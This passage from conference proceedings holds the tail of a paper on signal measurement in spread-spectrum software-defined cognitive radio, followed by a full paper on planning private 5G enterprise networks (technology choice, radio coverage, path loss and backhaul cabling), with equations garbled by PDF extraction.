account the dependences between parameters in (10), the facts that the coefficient 1/2 in the expression (24) does not determine a result a square of optimization, root func tion is monotonically increasing, and A1 = A1 K1 , L1 , σ∼2 , A2 = A2 K2 , L2 , σ∼2 , ξ1 ξ2 2 2 2 2 B1 = B1 K1 , L1 , σ∼ , B2 = B2 K2 , L2 , σ∼ , C1 = C1 L1 , σ∼ , σ∼ , C2 = η1 ξ2 ξ1 ξ1 2 2 C2 L2 , σ∼ , σ∼ . η2
ξ2
For the minimum of μ: 2 2 2 2 K1 , K2 , L1 , L2 , σ∼ , σ∼ , σ∼ , σ∼
arg
min K1 , K2 , L1 , L2 , σ∼2 , σ∼2 , σ∼2 , σ∼2 η1
η2
ξ1
η1
η2
ξ1
ξ2
(25)
B22 D21 + B12 D22 . (A1 B2 − B1 A2 )(B1 C2 − B1 D2 − C1 B2 + D1 B2 )
ξ2
For the minimum of Vη :
K1 , K2 , L1 , L2 , σ∼ , σ∼
arg
= opt
min
2 ,σ2 K1 ,K2 ,L1 ,L2 ,σ∼ ∼ ξ1
ξ2
2
2
ξ1
ξ2
= opt
A22 D21 + A21 D22 (A1 B2 − B1 A2 )2
(26) .
The optimization procedure in the expression (25) and (26) can be realized by means of a standard approach for the optimization of function of several variables. The use of the proposed technique can be based on the SDR architecture, which is designed as a vector processor [20]. This is possible due to a signal processing in the proposed technique, which is presented by the expression (4) and well adapted for the matrix and function operations in the conditions of processing of discretized signals in SDR receiving equipment.
206
O. Holubnychyi et al.
6 Conclusions The intelligent signal measurement technique for spread spectrum SDR cognitive radio systems is proposed in the paper. The proposed technique is based on the indirect measurement approach and uses correlation method based signal processing system with a set of mutually non-correlated measurement signals, which are formed additionally in the technique. The technique allows estimating the level of multiplicative noise (slow fading) and the variance of additive noise at the physical layer of wideband radio system, which uses orthogonal components and multi-position signals. The mathematical model of signal structures in spread spectrum SDR cognitive radio system and parameters to be measured are analyzed. Justification of the technique contains a detailed analysis of the results of signal processing in receiving equipment. The features of the proposed technique boil down to an impossibility of work under some sets of parameters that has been analyzed in the paper. The detailed analysis of accuracy of measurement in the proposed technique is based on the approach for accuracy of indirect measurement, taking into account the described mathematical model of signal and code structures in a spread spectrum cognitive radio system. The intelligent component of the proposed technique is based on an unsupervised adaptive tuning of the signal processing measurement system. It is realized by setting of their optimal interior parameters, which minimize measurement errors. The signal processing scheme, which implements the proposed signal measurement technique, consists of two units that may be taken for measurement channels. The practical significance of the results boils down to the use of the proposed technique in modern SDR applications, when measurements are carried out directly at the physical layer of radio systems, in particular, in SDR architectures, which are designed as vector processors. The prospect for further research is the development of modification of the proposed signal measurement technique in different norms, e.g., the L 1 norm, which might improve the accuracy of measurement.
References 1. Zhang, J., et al.: Measurements and statistical analyses of electromagnetic noise for industrial wireless communications. Int. J. Intell. Syst. 36(3), 1304–1330 (2021). https://doi.org/10. 1002/int.22343 2. Narayanan, S.J., et al.: Fuzzy decision trees embedded with evolutionary fuzzy clustering for locating users using wireless signal strength in an indoor environment. Int. J. Intell. Syst. 36(8), 4280–4297 (2021). https://doi.org/10.1002/int.22459 3. Isernhagen, H., Neemann, H., Kuhn, S., Guhmann, C.: Intelligent signal processing in an automated measurement data analysis system. In: IEEE Symposium on Computational Intelligence in Image and Signal Processing (CIISP), pp. 83–87. Honolulu, USA (2007). https:// doi.org/10.1109/CIISP.2007.369298 4. Middlestead, R.W.: Digital Communications with Emphasis on Data Modems: Theory, Analysis, Design, Simulation, Testing, and Applications, chap. Spread-Spectrum Communications. Wiley, Hoboken, NJ (2017)
Intelligent Signal Measurement Technique for Spread Spectrum Software
207
5. Micheletti, J.A., Godoy, E.P.: Improved indoor 3D localization using LoRa wireless communication. IEEE Lat. Am. Trans. 20(3), 481–487 (2022). https://doi.org/10.1109/TLA.2022. 9667147 6. Chew, D., Adams, A.L., Uher, J.: Wireless Coexistence: Standards, Challenges, and Intelligent Solutions, chap. Intelligent Radio Concepts. Wiley, Hoboken, NJ (2021) 7. Holubnychyi, A.H., Konakhovych, G.F.: Multiplicative complementary binary signal-code constructions. Radioelectron. Commun. Syst. 61(10), 431–443 (2018). https://doi.org/10. 3103/S0735272718100011 8. Holubnychyi, A.G., Konakhovych, G.F., Taranenko, A.G., Gabrousenko, Ye.I.: Comparison of additive and multiplicative complementary sequences for navigation and flight control systems. In: IEEE 5th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), pp. 24–27, Kiev, Ukraine (2018). https://doi.org/10.1109/ MSNMC.2018.8576275 9. Holubnychyi, A.G., Konakhovych, G.F., Odarchenko, R.S.: Signal constructions with low resultant sidelobes for pulse compression navigation and radar systems. In: IEEE 4th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), pp. 267–270. Kiev, Ukraine (2016). https://doi.org/10.1109/MSNMC.2016.7783158 10. Fujimoto, R.: Multi-level modulation for high-speed wireless and wireline transceivers. In: IEEE International Symposium on Radio-Frequency Integration Technology (RFIT). Nanjing, China (2019). https://doi.org/10.1109/RFIT.2019.8929137 11. Kafetzis, D., Vassilaras, S., Vardoulias, G., Koutsopoulos, I.: Software-defined networking meets software-defined radio in mobile ad hoc networks: state of the art and future directions. IEEE Access. 10, 9989–10014 (2022). https://doi.org/10.1109/ACCESS.2022.3144072 12. Dai, Z., et al.: DeepAoANet: learning angle of arrival from software defined radios with deep neural networks. IEEE Access 10, 3164–3176 (2022). https://doi.org/10.1109/ACCESS.2021. 3140146 13. Taylor, W. et al.: AI-based real-time classification of human activity using software defined radios. In: 1st International Conference on Microwave, Antennas & Circuits (ICMAC). Islamabad, Pakistan (2021). https://doi.org/10.1109/ICMAC54080.2021.9678242 14. Fukunaga, K., Maeda, N., Miwa, K., Ota, S.: Floating circuit S-parameter measurement using indirect measurement method. In: International Symposium on Electromagnetic Compatibility (EMC EUROPE). Rome, Italy (2020). https://doi.org/10.1109/EMCEUROPE48519.2020. 9245690 15. Grami, A.: Probability, Random Variables, Statistics, and Random Processes: Fundamentals & Applications. Wiley, Hoboken, NJ (2019) 16. Montgomery, D.C., Runger, G.C.: Applied Statistics and Probability for Engineers. Wiley, Hoboken (2020) 17. Figliola, R.S., Beasley, D.E.: Theory and Design for Mechanical Measurements. Wiley, Hoboken (2021) 18. Kuczmik, A., Hoffmann, S., Hoene, E.: Double pulse vs. indirect measurement: characterizing switching losses of integrated power modules with wide bandgap semiconductors. In: 11th International Conference on Integrated Power Electronics Systems (CIPS), Berlin, Germany (2020) 19. Bui, M.T., Doskocil, R., Krivanek, V.: The analysis of the effect of the parameters on indirect distance measurement using a digital camera. In: International Conference on Military Technologies (ICMT), Brno, Czech Republic (2019). https://doi.org/10.1109/MILTECHS.2019. 8870101 20. Chen, W., et al.: Design space exploration of SDR vector processor for 5G micro base stations. IEEE Access 9, 141367–141377 (2021). https://doi.org/10.1109/ACCESS.2021.3119292
Optimal Structure Construction of Private 5G Network for the Needs of Enterprises Roman Odarchenko1,3(B) , Tatiana Smirnova1 , Oleksii Smirnov2 , Serhii Bondar4 , and Dmytro Volosheniuk4 1 National Aviation University, Kyiv, Ukraine {odarchenko.r.s,smirnova_t}@ukr.net 2 Central European University, Kropivnickiy, Ukraine 3 Bundleslab KFT, Budapest, Hungary 4 International Research and Training Center for Information Technologies and Systems of the National Academy of Sciences of Ukraine and Ministry of Education and Science of Ukraine, Kyiv, Ukraine [email protected], [email protected]
Abstract. Today, there is a large number of wireless technologies. A decisive role among them in the process of industrial automation is assigned to fifth-generation communication technologies. 5G networks will provide service not only for traditional cellphones, but also for a huge amount of different M2M and IoT devices that have specific characteristics and requests. Therefore, science-based planning and automation of information networks that provide service to requests with specified performance indices is a very complex scientific, technical and economic task, without which it is almost impossible to create an enterprise information infrastructure that meets all the needs and formulated requirements. Thus, the purpose of this work is to improve the network architecture of the enterprise for further optimization of the production process. A 5G network planning method for enterprise production processes consisting of radio network covering, consecutive ensuring location definition for each basic station using radio signal path loss evaluation optimized model including minimal carrying capacity limit, connection quantity limit and its dependability and communication transition segment construction including the definition of the optimal location of the telecommunications closet facility has been developed. The developed method provides the possibility of planning the optimal structure of the 5G cellular network to optimize production processes, evaluate and reduce the total cost for the network construction, while guaranteeing the necessary indices of quality of service and reliability of network nodes. Keywords: 5G · private network · path loss · propagation models · network optimization · KPI · M2M communication · industrialization
1 Introduction There are many wireless technologies currently available, most often known to users by their marketing names [1]. The use of wireless solutions is a way to create reliable and high-performance corporate networks, the use of which can significantly expand © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 208–223, 2023. https://doi.org/10.1007/978-3-031-35467-0_14
Optimal Structure Construction of Private 5G Network
209
enterprise capabilities for Internet network access, efficient telephone communication (IP-telephony), security of the facilities and other objects using video control equipment and other tools of security and fire-alarms, technical process control and automation systems of industrial enterprises, systems for monitoring environmental indices and other purposes related to telemetric data transmission. Modern solutions for wireless networks provide highly controllable, automated and secure IT-infrastructure. Each technology has certain characteristics that determine its field of its application [2]. In these conditions, experts assign a leading role in the automation of production processes to the 5th generation communication technology - 5G. Taking into account a fact that 5G networks will be providing service not only for traditional cellphones, but also for a huge amount of different M2M and IoT devices with specific characteristics and requirements, the use of Network Slicing technology can improve the efficiency of mobile communication networks and the quality of provided services. With the virtualization of the network functions of the radio access network, the main functionality of 5G base stations responsible for digital signal processing, synchronization and control will be located in the cloud (Software Defined Radio - SDR) separately from radio heads (RRH) and antennas, allowing to realize the advantages of cognitive radio and reduce the capital and operating costs of the radio access network. The use of the concept of radio access self-organizing networks (Self Organizing Networks, or SON) will ensure an increase in the distribution efficiency, customer service quality and SDN, in which the network management level is separated from the transmission devices and implemented by software, will allow to redistribute hardware resources depending on the load, increasing the efficiency of its use, reducing operating costs by automating the processes of radio generation and coordinating the work of neighboring base stations of different levels (micro and macro base) [3]. The 5G network architecture (SDR and SDN) [4], where the network control level is separated from transfer devices and accomplished by software tools, allows to redistribute hardware resources depending on the load, increasing the effectiveness of their use [5, 6]. That is why the construction of such networks could be profitable in automating the production processes of a modern enterprise. Thus, it is necessary to develop the most effective approaches to planning the optimal architecture of private 5G networks for the needs of manufacturing enterprises. The rest of the paper is organized as follows: Sect. 2 provides a review of the relevant literature, Sect. 3 presents the problem statement and the main objectives of the paper, the selection of optimal design solutions for private networks is described in Sect. 4, Sect. 5 describes a method for 5G network planning for automation of enterprise production processes, and, finally, Sect. 6 contains the results of the research, and their discussion is presented in Sect. 7, finally, Sect. 8 describes the conclusions.
2 Background Analysis Considering the 5G networks planning methods [7–10], it can be stated that these methods are more related to the pure radio access networks planning and optimization. In these methods, different techniques have been applied. For example, in [7], network planning optimization model of 5th generation wireless technologies is formulated as a MILP task. [8] proposes a data-driven multi-objective optimization framework for ultradense 5G network planning with practical case studies. An efficient heuristic method,
210
R. Odarchenko et al.
called PLATEA, has been developed and practically solved in [9]. The most modern approaches to network planning and optimization of cellular networks of different generations are collected in [11]. 5G network planning and optimization with an overview of planning methods and processes applicable to the 4G era, and new considerations for 5G are discussed in [7]. The studies closest to the topic of the paper are reflected in [10, 12, 13]. But they also have their shortcomings that need to be addressed. In addition, planning a private enterprise network based on 5G has its own characteristics both in terms of radio planning and in terms of transport subsystem planning. All this should definitely be included in the consideration.
3 Problem Statement Thus, science-based planning and automation of information networks that provide service to requests with specified performance indices is a very complex scientific, technical and economic task. Creating an enterprise information infrastructure that meets all the needs and formulated requirements is almost impossible without its solution. At the same time, it is taken into account that one of the main problems in the deployment of modern wireless networks is more efficient planning, which makes it possible to provide a decent quality of service (target efficiency) and, on the one hand, increase economic efficiency of using network resources. So, the aim of this paper is to improve the network architecture of the enterprise for further optimization of the production process. To achieve the previously described purpose, it is necessary to solve the following scientific tasks: to analyze and make an appropriate choice of the optimal technology in order to use it for some production process optimization; to improve 5G cellular network planning method; to improve the method of designing and optimizing structured cable systems for the transport needs of a cellular network; to develop algorithmic support for the production needs of preliminary planning of communication networks. To achieve the objectives of the paper, the following methods have been used: mathematical statistics, methods of information theory and signal transmission; methods of the theory of propagation of electromagnetic waves; methods of direct synthesis.
4 Selection of Optimal Design Solutions for Private Networks Each manufacturing enterprise should count on getting the maximum effect from investing its own funds in its own informatization projects. The magnitude of this effect can be reflected in the amount of the company’s profit from the implementation of the informatization project. Based on these statements, it is possible to choose the optimal project solution using the Bayes-Laplace optimality criterion (BL-criterion) [14]. It is also advisable to justify the use of information net current effects of the project as an integral indice of the effectiveness of the project solution, as an evaluative optimality function.
Optimal Structure Construction of Private 5G Network
211
Normally, decision making about the potential investment can take place in a situation of uncertainty. At the same time such a formal scheme presumes obligatory availability of [15]: − → 1) alternative solution sets D( X ) available at the production enterprise. So it is necessary − → − → for this enterprise to adopt one of available solutions: X i ∈ D( X ), i = 1,…,n; − → 2) an environment with a set of mutually exclusive conditions Z j ∈ D( Z ), j = 1,…,m. At the same time, it is unknown for enterprise, which condition is (or would be) at that environment. At this concrete case, under external statuses for production enterprise that tends to optimize its production processes by the automation way, we would keep in mind the probability of different 5G wireless networks expansion; 3) evaluative optimality function E ij that characterizes profit (received benefit) of the − → → productive enterprise when choosing a projected solution X i ∈ D(− x ) in the situa− → tion, when the environment would be (or is already) situated under the Z j ∈ D( Z ) condition status that signifies concrete value of the evaluative optimality function for the project solution X i and environmental condition Z j . In this case, the situation of making a decision on the possibility of investing in a fundamentally new information and communication infrastructure can be characterized by the matrix of projected solutions (Table 1). Thus, E ij matrix elements are evaluative optimality functions − → that are also the quantitative value of the optimality criterion for each X i ∈ D( X ) − → projected solution as long as environment is in Z j ∈ D( Z ) state. Evaluative optimality function that is also an optimality criterion quantitative value is a profit (effect) from accomplishment of the informatization project. Table 1. Matrix of possible project solutions − → Alternative D( X )
− → Expected environment condition, D( Z ) − → − → … … Z1 Zj
− → Zm
E11
…
E1j
…
E 1m
… − → Xi
…
…
…
…
…
Ei1
…
Eij
…
Eim
… − → Xn
…
…
…
…
…
En1
…
Enj
…
Enm
− → X1
− → According to the Bayes-Laplace criterion, as the optimal X * ∈ D( X ) solution can be regarded such a solution, for which the mathematical expectation of the optimality resultant function approaches the maximum possible value [14]: EBL = − max− E =− max− → → jr → → X ∈D( X )
m
X ∈D( X ) j=1
pj • Eij .
212
R. Odarchenko et al.
The set of optimal variants according to BL-criterion is defined in the following way: m − → X = Xi ÷ Xi ∈ D(X )} ∧ EBL = max pj · Eij . Xi ∈D(X )
j=1
When posterior probabilities of environmental status are equally possible, BLcriterion is transforming to the Bernoulli-Laplace criterion: 1 = · −−max Eij −−−− → m → m
EBL
Xi ∈D(X ) j=1
Therefore, for the optimal choice of communication technology to support the automation of enterprise production processes, a set of possible project solutions for constructing a 5G network that will be implemented D(X) and a set of expected future environmental conditions D(Z) has to be created. As an example, this set could include possible frequency ranges for deploying different technologies in the available RF spectrum (Table 2). Table 2. Matrix for selecting a project solution for a cellular operator Alternative
− → solution D( X ) (Cellular network technology)
Probability distribution
Pq (0)
P2 (0)
Resultant evaluative function
P3 (0.25)
P4 (0.25) P5 (0.25) P6 (0.25) − → Environment condition D( Z ) (frequency range, MHz)
EBL = m Pj · Eij . j=1
− → Z1
− → Z2
− → Z3
− → Z4
− → Z5
− → Z6
700
800
900
1,800
2,100
2,600
Macrocells
0
0
2
0
1.8
0
0.95
Microcells
3
3
0
3
0
2.7
1.425
EBL = 1.425
We assume that 5G networks that use different potentially appropriate frequency bands (700 MHz, 800 MHz, 900 MHz, 1,800 MHz, 2,100 MHz, 2,600 MHz) can be used for deployment. Since the frequency bands “700 MHz” and “800 MHz” are still used by other radio technologies, the deployment probability for these bands is “0”. For other bands, equal probability was used. Also, technologies of macro- and microcells could be included. It should be emphasized that net present effect value is calculated using given expert evaluation and it is entered in Table 2 in conditional units. As an optimality criterion for the first information condition, evaluative function dispersion minimum or single function mathematical expectation entropy maximum can be used [6].
Optimal Structure Construction of Private 5G Network
213
Thus, the conclusion about the necessity to expand the structure of precisely microcell networks in the range of 700, 800 or 2,600 MHz at enterprises can be made after analyzing the result (the value of the resultant evaluative function is greater for microcells) presented in Table 2.
5 5G Network Planning for Automation of Enterprise Production Processes Wireless network for producing enterprise processes automation planning process is necessary to accomplish respectively to the following steps: radio network covering design from the definition of the basic station situation point (gNb at 5G networks), construction of the communication transport segment alongside the location of the telecommunication closets. Following consecution of steps would be represented in details thereunder. A wireless network for the production of the process of planning the automation of enterprise processes must be performed according to the following steps: designing a radio network coverage with determining the point of the base position of the station (gNb in 5G networks), construction of the communication transport segment alongside the location of telecommunication closets. Following consecution of steps would be represented in details below. 5.1 Radio Access Network Planning For the basic stations subsystem construction, a brand new model has been developed [16]. Quantity of necessary cell towers (gNb) for coverage of the whole necessary service zone can be defined by the following formula: NBS =
Sserv , Scell
(1)
where S serv is entire area of terminal network nodes linking; Area that is serviced by one gNb in cell can be defined in the following way: 2 Scell = π · rmax,
where r max is the maximal cell radius that is a function from various variables: rmax = f PgNb , Gtx , Grx , Bnode , Bfeed , IM , Lpath , Rnode , Nnode , CgNb , pbit ,
(2)
(3)
where Pgnb is transmitter power; Gtx , Grx are aerial amplifying indices of sending and receiving respectively; Bnode is losses at the terminal device; Bfeed is losses at feeder. While the feeder is absent (when transceiver is united with the aerial in the all-in-one unit form), it is necessary to take into account connectivity device design specifics; IM is interference margin;
214
R. Odarchenko et al.
L path is losses during the radio signal expansion; Rnode is necessary data transmission rate for the terminal node; N node is a quantity of terminal nodes; C gNb is common available traffic capacity gNb in cell; pbit is bounding probability of bit-error. Respectively, the quantity of necessary gNb is a function of numerous variables. In order to reduce the level of expenses for the network construction it is needed to be minimized: NgNb = f PgNb , Gtx , Grx , Bnode , Bfeed , IM , Lpath , Rnode , Nnode , CgNb , pbit → min. (4) Taking into account the fact that some variable parameters are specified practically (system technical characteristics), the parametrical optimization problem could be represented as follows: rmax = f PgNb , Gtx , Grx , Bnode , Bfeed , IM , Lpath , Rnode , Nnode , CgNb , pbit , hgNb , hnode → max. (5) However, following limits are also taking place: 0 < PgNb ≤ PgNb.max , Rnode.min < Rnode ≤ Rnode.max , 0 ≤ pbit ≤ pbit.add , hgNb.min ≤ hgNb ≤ hgNb.max , TC ≤ TC add . Price of the cell tower installation includes the cost of the gNb TC gNb , installation price gNb TC inst.gNb , aerial erection price gNb TC inst.ant , antenna and feeder line gNb installation to the aerial TC feed , price of an aerial TC ant : TC = TCgNb + TCinst.gNb + TCfeed + TCant + TCinst.ant ,
(6)
Price of the antenna and feeder line TC ant = TC m.ant ·l feed , where l feed is the length of the antenna and feeder line, aerial erection price to the height hgNb TC inst.ant = hgNb ·TC m.inst.ant , where TC m.inst.ant is one meter of the antenna installation price gNb. TC inst.gNb is defined by contractor that would be accomplishing such works, TC ant is defined by the equipment manufacturer. General carrying capacity of one gNb can be defined using the following equation: CgNB = F · β,
(7)
where β is a spectral effectiveness of the basic station; ΔF is general reserved lane, frequently at the cell for one gNb. Necessary carrying capacity for providing service to all users at the cell can be defined in the following way: Rtot = Rnode · Nact.node ,
(8)
Optimal Structure Construction of Private 5G Network
215
where N act.node is a quantity of active users that are needed to be served. It is needed to be less than general basic station carrying capacity: Rtot ≤ CgNb , Quantity of active users depends on service area within the enterprise limits S build , on the street S outdoor , σ switched node densities at the buildings and on the street respectively and indexes of its activity ν: Nact.node = νbuild · σbuild · Sbuild · Nfloors + νoutdoor · σoutdoor · S outdoor ,
(9)
Node switching densities are defined in the following way for the Fig. 1: σ =
Nnode . S
(10)
Following condition is needed to be executed for Rtot : Rtot = Rnode · (νbuild · σbuild · Sbuild · Nfloor +νoutdoor · σoutdoor · Soutdoor ) ≤ F · β.
(11)
Area of the closed facilities in cells could be computed in the following way: Sbuild = Scell · ωbuild .
(12)
So covering area on the open region would be: 2 − Soutdoor = Scell − Sbuild = π · rmax . 2 2 π · rmax · ωbuild = π · rmax (1 − ωbuild )
(13)
2 ·ω Rtot = Rnode · (νbuild · σbuild · π · rmax build · Nfloor + 2 νnode · σoutdoor · π · rmax · (1 − ωbuild )) = 2 · (ν Rnode · π · rmax build · σbuild · ωbuild · Nfloor + νoutdoor · σoutdoor · (1 − ωbuild )) ≤ F · β.
(14)
Accordingly:
The maximum allowable path loss for 5G networks can be determined as follows. Frequency ranges from microwave to milliwave are used by 5G systems. That’s why standardized models seize very large spectrum of working ranges and have a frequencydepending component for maintenance of frequencies from 400 MHz to 100 GHz. Frequency dependence is defined not only for losses in lane but also for each model parameter necessary for the impulse characteristics and it describes four categories of losses in lane models, each of that has LOS components (signal spreading in the lineof-sight zone) and NLOS (signal spreading in the non-line of sight zone). Taking a UM-environment (three-dimensional urban microcells) to estimate NLOS [17], the following model for estimating radio-signal power losses along the propagation path can be used: 5G(a) 5G (15) PL5G 3DUMaLOS = max PL3DUMaLOS , PL3DUMaNLOS ,
216
R. Odarchenko et al.
Fig. 1. Schematic picture of the basic station service zone (production facilities are depicted in black)
where PL5G 3DUMaLOS =
PL1 , 10m < d < dbreak . PL2 , dbreak < d < 5km
(16)
Taking into account that: PL1 = 28.0 + 22log(d ) + 20log(f )
(17)
PL2 = 28.0 + 40log(d ) + 20log(f ) − 9log (d break )2 + (ht − hr )2 ,
(18)
we obtain the following: 5G(a)
PL3DUMaNLOS = 13.54 + 39.081log(d ) + 20log(f ) − 0.6(hr − 1.5)
(19)
for connection distance range from 10 m to 5 km. 5.2 Backhaul Planning Justified planning and optimization procedures for a 5G wireless informational network cannot be done without calculation of the structural cable system (SCS) design that would provide the connection of different network parts. Horizontal subsystem design is the most important part of the SCS development design stage. Decisions made in the process of accomplishing such works are determinative for the technical and economic efficiency of the created SCS, and also have a huge influence on capital costs in the process of creating an information network. It is exactly in the horizontal subsystem, where the vast majority of the SCS telecommunication equipment is situated, both in terms of classification and quantity, and in terms of price.
Optimal Structure Construction of Private 5G Network
217
Let us consider two basic calculation methods of cable quantity that expends on the horizontal subsystem design: • summarization method; • statistical method. The summarization method resides in each horizontal cable lane length calculation with following addition of values obtained in the following way. Some technological margin and also margin for achieving of processing at the junction points (JPs) and on the patch panels are added to the received result. The statistical method is a practically realizing condition of the central limit theorem of probability theory. The sense of this method is in usage of separate laying total length evaluation for calculation of the total horizontal cable length used for the concrete cable system accomplishment, namely, accomplishing of its part that is maintained by a separate telecommunication closet. Concretely, the evaluation process is based on statistical regularities that are certainly discovered during any structured cable wiring accomplishment. Some increase in the reliability of calculations by the statistical method is additionally provided by the fact that, according to ISO/IEC 11801 standard, the horizontal subsystem cable cannot be longer than 90 m (for the Ethernet technology). The sense of the method is in the following: the length of each j-track can be represented in the following way: Lj = νj + ξj where ν j is a cable length laid along the vertical sections; ξ j is a random value that has some law of division on the working zone area xOy that is maintained by the commutation equipment installed in this technical facility. Supposing that: • gNb basic stations are equipped by the JPs of the same type and distributed over the territory area xOy, which is maintained evenly; • the location of technical facilities is optimal; • cable tracks of the horizontal cables majority are designed according to the same rule, so it can be adopted with the sufficient for practice certainty that ν j = const. In case of described conditions fulfilling the function of the selected laying length, the distribution probability density is symmetrical (has zero asymmetry). The mark of the cable track average length during the symmetrical distribution can be found as half the sum of the lengths of the longest and shortest cable tracks. On the basis of made assumptions, an average cable length L aυ that expends on the one laying accomplishment, can be equal to: Laυ =
(Lmax + Lmin ) Ks + X , 2
where L max and L min are cable track lengths from the commutational element that is the furthest element from the input point to the telecommunication closet, to the JP, accordingly, to the closest and furthest gNb basic station, calculated, among other things,
218
R. Odarchenko et al.
taking into account the features of the cable laying, all of the descents, ascents, turns, inter-floors (in presence of such), etc.; Ks – technological reserve coefficient, equals 1.1 (10%); X – margin for the cable processing accomplishment. Furthermore, general quantity of layings N cr , for that one coil of cable is enough can be calculated: Ncr =
Lcb , Lav
where L cb is the cable coil length. As the last step, the whole quantity of the L c cable needed for the cable system creation could be received: Lc = Lcb ×
Nto , Lcr
where N to is the quantity of JPs at the constructed SCS. The result of dividing at the formula ordinarily is non-integer value, so the round off to the integer number procedure takes place. Area of the Statistical Method Application. Cable track lengths, (according to the previously accepted assumptions, equivalent to the lengths of selected SCS horizontal subsystem layings), can be estimated as independent random values. According to the probability theory, the arithmetic average dispersion of paired random values is n times smaller than σ2 of each value, in other words, it can be written at specifications that: D(lav ) =
σ2 . n
The n-quantity of selected layings, during which the root-mean-square deviation of the lengths average value from the mathematical expectation would not surpass preintended value, for reliability, for example – 5%, can be found based on the following correlation: σ/lav ≤ 0.05. With σ/lav = 0.42 (an assumption based on the practical result), assume, that n would be equal not less than 84, i.e. it is advisable to use the statistical method to calculate the cable system or its parts that are providing service to N = 42 or more commutative devices [19]. One of the conditions for using the statistical method was an assumption that the distribution function is symmetrical. Data processing of practically accomplished projects shows that asymmetry average value equals approximately 0.44, or the difference between a distributed function and a symmetric one, in fact, cannot be counted negligibly small. Consider that this difference influences on the level of reliability of the calculations. For it, according to the method of moments, the actually obtained distribution function is approximated by the Gram-Charlier row [18] that represents normal a distribution
Optimal Structure Construction of Private 5G Network
219
with correction. To simplify further calculations, during the row construction only two first members are retained in it: γ3 3 1 x2
x − 3x + . . . , (20) ϕ(x) = √ e 2 1 + 3l 2π where γ3 is an asymmetry index; x = t−Mt σ is standardized random value. The probability that horizontal cable length would not be greater than x, would be: x2 γ3
u (x) = (x) + √ (21) 1 − x2 e 2 , 3l 2π where Φ u (x) is an approximated distribution function, F(x) is a normal distribution function. Selection of the Location of Technical Premises for Telecommunications Closet Floor. Due to the large number of JPs, that are installed in the process of the SCS horizontal wiring, the problem of optimal design of bottom level of the cable system according to different criteria allows to reduce the cost of creating the cable wiring, as well as the time of the whole project accomplishment dramatically. Location coordinates of the telecommunication closet facility that provide JPs services in the concrete working zone and optimal by the selected laying of the minimal average length criterion coincide with the plate mass center that is situated on the xOy plane. At the same time, the plate form suits to the maintained work zone topology and its density ρ (x, y) is equivalent to the workplace placement density. Technical facility location coordinates can be calculated according to the following formulas: ¨ ¨ 1 1 ρxdxdy; y0 = ρxdxdy; (22) x0 = M M ˜ where M= ρdxdy is general quantity of gNb based stations that are maintained by certain telecommunication closet. In this case, if the serviced working area depicted in Fig. 2 is presented as a rectangle with sides (a;b) (c;d) and some selected JPs are distributed in the figure equally, then ρ(x,y) = ρ = const, telecommunication closet facility location coordinates that are optimal by linear horizontal cable minimal summarized length would be equal to: b−a d −c ; y0 = . 2 2 Formerly it has been shown that in such case an average length of cable laying would be close to x0 =
(b − a) + (d − c) . 4 During the arrangement of telecommunication closet facility position on the edge of service zone, for example on the F point (Fig. 2), the evaluation of average length of cable laying made by the same principles, would be equal to
l =
l =
(b − a) + (d − c) . 2
220
R. Odarchenko et al.
Fig. 2. Illustration for determining the location of telecommunication closet
So, due to the optimization of the place of technological facility position, the economy of cable, which expends for each average statistical laying accomplishment, can achieve: l = 100 = 50%. l On the basis of fore quoted theoretical base, telecommunication closet technical facility (Fig. 3) optimizing schematic planning has been accomplished for effective information-communication network based on 5G technologies planning. Following the represented scheme, calculations of the telecommunication closet technical facility location and cable quantity, spent on the subsystem accomplishment can be done.
Fig. 3. Schematic representation of the projected network
Optimal Structure Construction of Private 5G Network
221
6 Results Thus, as a result of the research, the method of private cellular 5G networks planning has been improved. The generalized model of the method is shown in the Fig. 4 below.
Fig. 4. Schematic representation of the method of private cellular 5G network planning
The main steps of the method are as follows: Stage 1. Selection of optimal design solutions for private networks. At this stage, an assessment of the optimality of a group of solutions that can be applied to design and deploy a private 5G network for an enterprise is made. Stage 2. Radio access network planning. This stage consists in assessing the maximum allowable attenuation of radio signals along the radio wave propagation path for specific conditions, taking into account the imposed restrictions on the quality of service for subscribers of a private network, as well as its cost. As a result of this stage, the design of the substructure of base stations with the approximate coordinates of their location takes place. Stage 3. Backhaul planning. At this stage, for the designed radio network, the cabling structure is planned, which will be used to connect the base stations and switching centers. It also calculates the optimal amount of cable (fiber) that is required for the effective functioning of the network.
7 Discussion Automation of production processes is very important nowadays. In order to minimize costs and at the same time increase the efficiency of production processes, a 5G private network planning method has been developed, which is obviously the most suitable for solving the voiced tasks, for the needs of the enterprise. This method is very timely and potentially useful. Unlike other existing methods [7–10], this method takes into account much more input characteristics and functions of production enterprises. Thus, planning accuracy can be improved for a value of up to 7–10%. In addition, for a comprehensive solution of the planning problem, the stage of accurate planning of the cable subsystem is also introduced with the determination of the optimal location of the switching junction stations. In further studies, it is planned to design a 5G test network and verify the developed method.
222
R. Odarchenko et al.
8 Conclusions The research carried out in this work makes it possible to develop methods for improving the network architecture of enterprises in order to further optimize production processes. Thus, the 5G planning method for enterprise production processes, consisting of a radio network covering consecutive ensuring for each basic station location definition using radio signal path loss evaluation optimized model including minimal carrying capacity limit, connection quantity limit and its dependability and communication transition segment construction including the definition of telecommunication closet facility optimal location is developed in this paper. The developed method provides the possibility to plan the optimal structure of 5G cellular network for production processes optimization, to evaluate and reduce total expands for the network construction, guaranteeing necessary network nodes service quality and reliability indexes at the same time. Acknowledgement. This work was supported in part by the European Commission under the 5G-TOURS: SmarT mObility, media and e-health for toURists and citizenS (H2020-ICT-2018– 2020 call, grant number 856950). Opinions, expressed in this paper are those of the authors and do not necessarily represent the whole project.
